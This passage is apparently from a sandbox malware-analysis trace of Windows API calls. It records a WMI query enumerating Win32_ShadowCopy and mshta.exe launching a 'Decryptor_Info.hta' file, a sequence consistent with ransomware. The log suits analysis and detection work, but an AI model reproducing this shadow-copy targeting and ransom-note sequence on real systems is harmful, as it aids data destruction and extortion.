cchCount2=4) returned 1 [0099.206] malloc (_Size=0xc) returned 0x21d20c0 [0099.206] free (_Block=0x21d2168) [0099.207] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x2708c17b | out: _String=0x0, _Context=0x2708c17b) returned="from" [0099.207] lstrlenW (lpString="FROM") returned 4 [0099.207] lstrlenW (lpString="from") returned 4 [0099.207] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0099.207] malloc (_Size=0xc) returned 0x21d2168 [0099.207] free (_Block=0x21d20c0) [0099.207] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x2708c17b | out: _String=0x0, _Context=0x2708c17b) returned="Win32_ShadowCopy" [0099.207] malloc (_Size=0xc) returned 0x21d20c0 [0099.208] free (_Block=0x21d2168) [0099.208] free (_Block=0x27ff68) [0099.208] malloc (_Size=0xc) returned 0x21d2168 [0099.208] malloc (_Size=0xc) returned 0x21d20a8 [0099.208] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0099.208] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0099.209] free (_Block=0x21d2078) [0099.209] free (_Block=0x21d2168) [0099.209] ??0CHString@@QAE@XZ () returned 0x14f99c [0099.209] GetCurrentThreadId () returned 0xdb4 [0099.209] malloc (_Size=0xc) returned 0x21d2168 [0099.209] malloc (_Size=0xc) returned 0x21d2078 [0099.209] malloc (_Size=0xc) returned 0x21d2108 [0099.209] malloc (_Size=0xc) returned 0x21d2120 [0099.210] malloc (_Size=0xc) returned 0x21d2138 [0099.210] SysStringLen (param_1="\\\\") returned 0x2 [0099.210] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0099.210] malloc (_Size=0xc) returned 0x21d2150 [0099.210] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0099.210] SysStringLen (param_1="\\") returned 0x1 [0099.210] malloc (_Size=0xc) returned 0x21d2180 [0099.211] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0099.211] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0099.211] free (_Block=0x21d2150) [0099.211] free (_Block=0x21d2138) [0099.211] free (_Block=0x21d2120) [0099.212] free (_Block=0x21d2108) [0099.212] free (_Block=0x21d2078) [0099.212] free (_Block=0x21d2168) [0099.212] malloc (_Size=0xc) returned 0x21d2168 [0099.212] malloc (_Size=0xc) returned 0x21d2078 [0099.212] malloc (_Size=0xc) returned 0x21d2108 [0099.212] WbemLocator:IWbemLocator:ConnectServer (in: This=0xa50828, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xadc204 | out: ppNamespace=0xadc204*=0xa5d0bc) returned 0x0 [0099.623] free (_Block=0x21d2108) [0099.623] free (_Block=0x21d2078) [0099.623] free (_Block=0x21d2168) [0099.623] CoSetProxyBlanket (pProxy=0xa5d0bc, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0099.624] free (_Block=0x21d2180) [0099.627] ??1CHString@@QAE@XZ () returned 0x75330504 [0099.627] ??0CHString@@QAE@XZ () returned 0x14f994 [0099.627] GetCurrentThreadId () returned 0xdb4 [0099.627] malloc (_Size=0xc) returned 0x21d2180 [0099.627] lstrlenA (lpString="") returned 0 [0099.627] malloc (_Size=0x2) returned 0x272860 [0099.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa926a2, cbMultiByte=-1, lpWideCharStr=0x272860, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0099.627] free (_Block=0x272860) [0099.627] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0099.627] SysStringLen (param_1="") returned 0x0 [0099.628] free (_Block=0x21d2180) [0099.628] malloc (_Size=0xc) returned 0x21d2180 [0099.628] IWbemServices:ExecQuery (in: This=0xa5d0bc, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy", lFlags=0, pCtx=0x0, ppEnum=0x14f990 | out: ppEnum=0x14f990*=0x0) returned 0x80041014 [0104.502] free (_Block=0x21d2180) [0104.503] _CxxThrowException () [0104.503] malloc (_Size=0x10) returned 0x21d2180 [0104.503] ??1CHString@@QAE@XZ () returned 0x75330504 [0104.503] free (_Block=0x21d20c0) [0104.503] free (_Block=0x21d20a8) [0104.503] GetCurrentThreadId () returned 0xdb4 [0104.503] ??0CHString@@QAE@PBG@Z () returned 0x14fa54 [0104.503] ??YCHString@@QAEABV0@PBG@Z () returned 0x14fa54 [0104.503] ??0CHString@@QAE@XZ () returned 0x14f918 [0104.503] malloc (_Size=0xc) returned 0x21d20a8 [0104.503] malloc (_Size=0xc) returned 0x21d20c0 [0104.504] SysStringLen (param_1="") returned 0x0 [0104.504] free (_Block=0x21d20a8) [0104.504] CoCreateInstance (in: rclsid=0xa96cb0*(Data1=0xeb87e1bd, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa96c00*(Data1=0xeb87e1bc, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppv=0xadc21c | out: ppv=0xadc21c*=0xa50810) returned 0x0 [0104.508] WbemStatusCodeText:IWbemStatusCodeText:GetErrorCodeText (in: This=0xa50810, hRes=0x80041014, LocaleId=0x0, lFlags=0, MessageText=0x14f930 | out: MessageText=0x14f930*="Initialization failure\r\n") returned 0x0 [0104.508] free (_Block=0x21d20c0) [0104.508] malloc (_Size=0xc) returned 0x21d20c0 [0104.509] WbemStatusCodeText:IWbemStatusCodeText:GetFacilityCodeText (in: This=0xa50810, hRes=0x80041014, LocaleId=0x0, lFlags=0, MessageText=0x14f954 | out: MessageText=0x14f954*="WMI") returned 0x0 [0104.509] malloc (_Size=0xc) returned 0x21d20a8 [0104.509] lstrlenW (lpString="WMI") returned 3 [0104.509] lstrlenW (lpString="Wbem") returned 4 [0104.509] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Wbem", cchCount1=4, lpString2="WMI", cchCount2=3) returned 1 [0104.509] lstrlenW (lpString="WMI") returned 3 [0104.509] lstrlenW (lpString="WMI") returned 3 [0104.509] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WMI", cchCount1=3, lpString2="WMI", cchCount2=3) returned 2 [0104.509] WbemStatusCodeText:IUnknown:Release (This=0xa50810) returned 0x0 [0104.509] ??1CHString@@QAE@XZ () returned 0x75330504 [0104.509] LoadStringW (in: hInstance=0x0, uID=0xb7f3, lpBuffer=0x14f180, cchBufferMax=1024 | out: lpBuffer="ERROR:\r\nDescription = %1") returned 0x18 [0104.509] FormatMessageW (in: dwFlags=0x2500, lpSource=0x14f180, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x14f17c, nSize=0x0, Arguments=0x14f168 | out: lpBuffer="㹨PERROR:\r\nDescription = %1") returned 0x2e [0104.510] malloc (_Size=0xc) returned 0x21d2168 [0104.510] LocalFree (hMem=0x503e68) returned 0x0 [0104.510] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Initialization failure\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0104.510] malloc (_Size=0x2f) returned 0x21d2448 [0104.510] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Initialization failure\r\n", cchWideChar=-1, lpMultiByteStr=0x21d2448, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ERROR:\r\nDescription = Initialization failure\r\n", lpUsedDefaultChar=0x0) returned 47 [0104.510] fprintf (in: _File=0x77032940, _Format="%s" | out: _File=0x77032940) returned 46 [0104.512] fflush (in: _File=0x77032940 | out: _File=0x77032940) returned 0 [0104.512] free (_Block=0x21d2448) [0104.512] free (_Block=0x21d2168) [0104.512] free (_Block=0x21d20a8) [0104.512] free (_Block=0x21d20c0) [0104.512] ??1CHString@@QAE@XZ () returned 0x1 [0104.512] ??0CHString@@QAE@PBG@Z () returned 0x14fa74 [0104.512] ??YCHString@@QAEABV0@PBG@Z () returned 0x14fa74 [0104.512] GetCurrentThreadId () returned 0xdb4 [0104.512] ??1CHString@@QAE@XZ () returned 0x1 [0104.512] WbemLocator:IUnknown:Release (This=0xa5d0bc) returned 0x0 [0104.515] ?Empty@CHString@@QAEXXZ () returned 0x75330504 [0104.515] free (_Block=0x21d2180) [0104.516] _kbhit () returned 0x0 [0104.545] free (_Block=0x273228) [0104.545] free (_Block=0x21d2060) [0104.545] free (_Block=0x27fe88) [0104.545] free (_Block=0x27fe70) [0104.546] free (_Block=0x27fe58) [0104.546] free (_Block=0x2731c8) [0104.546] free (_Block=0x27eb88) [0104.546] free (_Block=0x27ff30) [0104.546] free (_Block=0x21d20d8) [0104.546] free (_Block=0x27feb0) [0104.546] free (_Block=0x21d20f0) [0104.546] free (_Block=0x27ebc8) [0104.546] free (_Block=0x27ff20) [0104.546] free (_Block=0x272ee0) [0104.546] free (_Block=0x27fef8) [0104.546] ?Empty@CHString@@QAEXXZ () returned 0x75330504 [0104.546] free (_Block=0x2731f8) [0104.546] free (_Block=0x27eba8) [0104.546] free (_Block=0x21d2090) [0104.547] free (_Block=0x272788) [0104.547] free (_Block=0x2727d0) [0104.547] free (_Block=0x272818) [0104.547] free (_Block=0x27ebe8) [0104.547] free (_Block=0x2728c8) [0104.547] free (_Block=0x272ec8) [0104.547] free (_Block=0x27e8c8) [0104.547] free (_Block=0x272eb0) [0104.547] free (_Block=0x27e8a8) [0104.547] free (_Block=0x272e98) [0104.547] free (_Block=0x27e888) [0104.547] free (_Block=0x272a10) [0104.548] free (_Block=0x272a28) [0104.548] free (_Block=0x2729d8) [0104.548] free (_Block=0x2729f0) [0104.548] free (_Block=0x272a48) [0104.548] free (_Block=0x272a60) [0104.548] free (_Block=0x272a80) [0104.548] free (_Block=0x27e868) [0104.548] free (_Block=0x272968) [0104.548] free (_Block=0x272980) [0104.549] free (_Block=0x272930) [0104.549] free (_Block=0x272948) [0104.549] free (_Block=0x2729a0) [0104.549] free (_Block=0x2729b8) [0104.549] free (_Block=0x2728f8) [0104.549] free (_Block=0x272910) [0104.549] free (_Block=0x272880) [0104.549] free (_Block=0x273fb8) [0104.549] free (_Block=0x21d04a0) [0104.549] WbemLocator:IUnknown:Release (This=0xa50828) returned 0x2 [0104.549] WbemLocator:IUnknown:Release (This=0xa5d064) returned 0x0 [0104.551] WbemLocator:IUnknown:Release (This=0xa5d00c) returned 0x0 [0104.632] WbemLocator:IUnknown:Release (This=0xa50828) returned 0x1 [0104.632] ?Empty@CHString@@QAEXXZ () returned 0x75330504 [0104.632] WbemLocator:IUnknown:Release (This=0xa50828) returned 0x0 [0104.632] free (_Block=0x27fdf8) [0104.633] free (_Block=0x27fe10) [0104.633] free (_Block=0x27eb48) [0104.633] free (_Block=0x27fe28) [0104.633] free (_Block=0x27fe40) [0104.633] free (_Block=0x27eb68) [0104.633] free (_Block=0x27fcd8) [0104.633] free (_Block=0x27fcf0) [0104.633] free (_Block=0x27ea88) [0104.633] free (_Block=0x27fd08) [0104.634] free (_Block=0x27fd20) [0104.634] free (_Block=0x27eaa8) [0104.634] free (_Block=0x27fc78) [0104.634] free (_Block=0x27fc90) [0104.634] free (_Block=0x27ea48) [0104.634] free (_Block=0x27fca8) [0104.634] free (_Block=0x27fcc0) [0104.634] free (_Block=0x27ea68) [0104.634] free (_Block=0x27fd98) [0104.635] free (_Block=0x27fdb0) [0104.635] free (_Block=0x27eb08) [0104.635] free (_Block=0x27fdc8) [0104.635] free (_Block=0x27fde0) [0104.635] free (_Block=0x27eb28) [0104.635] free (_Block=0x27fc18) [0104.635] free (_Block=0x27fc30) [0104.635] free (_Block=0x27ea08) [0104.636] free (_Block=0x27fc48) [0104.636] free (_Block=0x27fc60) [0104.636] free (_Block=0x27ea28) [0104.636] free (_Block=0x27fd38) [0104.636] free (_Block=0x27fd50) [0104.636] free (_Block=0x27eac8) [0104.636] free (_Block=0x27fd68) [0104.636] free (_Block=0x27fd80) [0104.636] free (_Block=0x27eae8) [0104.637] free (_Block=0x27fb88) [0104.637] free (_Block=0x27fba0) [0104.637] free (_Block=0x27e9a8) [0104.637] free (_Block=0x273160) [0104.637] free (_Block=0x273178) [0104.637] free (_Block=0x27e908) [0104.637] free (_Block=0x272f28) [0104.637] free (_Block=0x272f40) [0104.637] free (_Block=0x27e8e8) [0104.638] free (_Block=0x27faf8) [0104.638] free (_Block=0x27fb10) [0104.638] free (_Block=0x27e948) [0104.638] free (_Block=0x27fbb8) [0104.638] free (_Block=0x27fbd0) [0104.638] free (_Block=0x27e9c8) [0104.638] free (_Block=0x27fac8) [0104.638] free (_Block=0x27fae0) [0104.638] free (_Block=0x27e928) [0104.639] free (_Block=0x27fb28) [0104.639] free (_Block=0x27fb40) [0104.639] free (_Block=0x27e968) [0104.639] free (_Block=0x27fb58) [0104.639] free (_Block=0x27fb70) [0104.639] free (_Block=0x27e988) [0104.639] free (_Block=0x27fbe8) [0104.639] free (_Block=0x27fc00) [0104.639] free (_Block=0x27e9e8) [0104.639] CoUninitialize () [0105.098] exit (_Code=-2147217388) [0105.098] free (_Block=0x273190) [0105.099] free (_Block=0x273e88) [0105.099] ??1CHString@@QAE@XZ () returned 0x75330504 [0105.099] free (_Block=0x273000) [0105.099] free (_Block=0x2728e8) [0105.099] free (_Block=0x273e68) [0105.099] free (_Block=0x273e48) [0105.099] free (_Block=0x273e18) [0105.099] free (_Block=0x273df8) [0105.099] free (_Block=0x273dc8) [0105.099] free (_Block=0x2713d8) [0105.099] free (_Block=0x2713b8) [0105.099] ??1CHString@@QAE@XZ () returned 0x75330504 [0105.099] free (_Block=0x272f58) Thread: id = 168 os_tid = 0xdd0 Thread: id = 182 os_tid = 0xe10 Thread: id = 183 os_tid = 0xe14 Thread: id = 184 os_tid = 0xe18 Thread: id = 185 os_tid = 0xe1c Process: id = "40" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x6106b000" os_pid = "0xa50" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "20" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:000428ce" [0xc000000f] Thread: id = 186 os_tid = 0x674 Thread: id = 187 os_tid = 0xa78 Thread: id = 188 os_tid = 0xa70 Thread: id = 189 os_tid = 0xa6c Thread: id = 190 os_tid = 0xa68 Thread: id = 191 os_tid = 0xa64 Thread: id = 192 os_tid = 0xa60 Thread: id = 193 os_tid = 0xa58 Thread: id = 194 os_tid = 0xa54 Thread: id = 209 os_tid = 0xe54 Thread: id = 240 os_tid = 0xf88 Thread: id = 280 os_tid = 0xaf8 Process: id = "41" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x61f66000" os_pid = "0xa18" os_integrity_level = "0x4000" os_privileges = "0xe60b1e990" monitor_reason = "rpc_server" parent_id = "20" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 195 os_tid = 0x534 Thread: id = 196 os_tid = 0xa44 Thread: id = 197 os_tid = 0xa34 Thread: id = 198 os_tid = 0xa30 Thread: id = 199 os_tid = 0xa2c Thread: id = 200 os_tid = 0xa28 Thread: id = 201 os_tid = 0xa20 Thread: id = 202 os_tid = 0xa1c Thread: id = 228 os_tid = 0xf2c Thread: id = 270 os_tid = 0xfbc Thread: id = 271 os_tid = 0xfc0 Process: id = "42" image_name = "wmiprvse.exe" filename = "c:\\windows\\syswow64\\wbem\\wmiprvse.exe" page_root = "0x35e8f000" os_pid = "0xe20" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "20" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\sysWOW64\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:00062587" [0xc000000f] Thread: id = 203 os_tid = 0xe24 Thread: id = 204 os_tid = 0xe40 Thread: id = 205 os_tid = 0xe44 Thread: id = 206 os_tid = 0xe48 Thread: id = 207 os_tid = 0xe4c Thread: id = 208 os_tid = 0xe50 Thread: id = 210 os_tid = 0xe58 Thread: id = 211 os_tid = 0xe6c Process: id = "43" image_name = "mshta.exe" filename = "c:\\windows\\syswow64\\mshta.exe" page_root = "0x32f20000" os_pid = "0xe98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0xac4" cmd_line = "\"C:\\Windows\\SysWOW64\\mshta.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decryptor_Info.hta\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 218 os_tid = 0xe9c [0107.866] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22f834 | out: lpSystemTimeAsFileTime=0x22f834*(dwLowDateTime=0x2dd94920, dwHighDateTime=0x1d62227)) [0107.867] GetCurrentProcessId () returned 0xe98 [0107.867] GetCurrentThreadId () returned 0xe9c [0107.867] GetTickCount () returned 0x11518ee [0107.867] QueryPerformanceCounter (in: lpPerformanceCount=0x22f82c | out: lpPerformanceCount=0x22f82c*=22782203613) returned 1 [0107.867] GetModuleHandleA (lpModuleName=0x0) returned 0xe10000 [0107.867] GetStartupInfoA (in: lpStartupInfo=0x22f740 | out: lpStartupInfo=0x22f740*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SysWOW64\\mshta.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0107.867] GetVersionExA (in: lpVersionInformation=0x22f790*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x22f790*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0107.867] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x720000 [0107.868] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0107.868] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0107.868] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0107.868] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0107.868] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0107.868] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0107.868] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0107.869] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0107.869] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0107.869] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0107.869] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0107.869] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0107.869] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0107.869] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0107.869] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0107.870] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0107.870] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0107.870] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0107.870] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0107.870] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0107.870] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0107.870] GetModuleHandleW (lpModuleName="kernelbase.dll") returned 0x76c10000 [0107.870] GetProcAddress (hModule=0x76c10000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76c2004f [0107.870] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0107.871] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0107.871] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0107.871] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0107.871] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0107.871] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0107.871] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0107.871] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0107.872] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0107.872] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0107.872] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0107.872] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0107.872] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0107.872] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0107.872] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0107.873] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0107.873] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0107.873] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0107.873] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0107.873] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0107.873] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0107.873] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0107.874] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0107.874] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0107.874] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0107.874] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0107.874] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0107.874] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0107.875] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0107.875] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0107.875] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x214) returned 0x7207d0 [0107.875] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0107.875] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0107.875] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0107.875] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0107.876] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0107.876] GetStartupInfoA (in: lpStartupInfo=0x22f6c4 | out: lpStartupInfo=0x22f6c4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SysWOW64\\mshta.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0107.876] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x480) returned 0x7209f0 [0107.876] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0107.876] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0107.876] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0107.876] SetHandleCount (uNumber=0x20) returned 0x20 [0107.876] GetCommandLineA () returned="\"C:\\Windows\\SysWOW64\\mshta.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decryptor_Info.hta\" " [0107.876] GetEnvironmentStringsW () returned 0x4601c8* [0107.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0107.876] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x565) returned 0x720e78 [0107.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x720e78, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0107.877] FreeEnvironmentStringsW (penv=0x4601c8) returned 1 [0107.877] GetLastError () returned 0x0 [0107.877] SetLastError (dwErrCode=0x0) [0107.877] GetLastError () returned 0x0 [0107.877] SetLastError (dwErrCode=0x0) [0107.877] 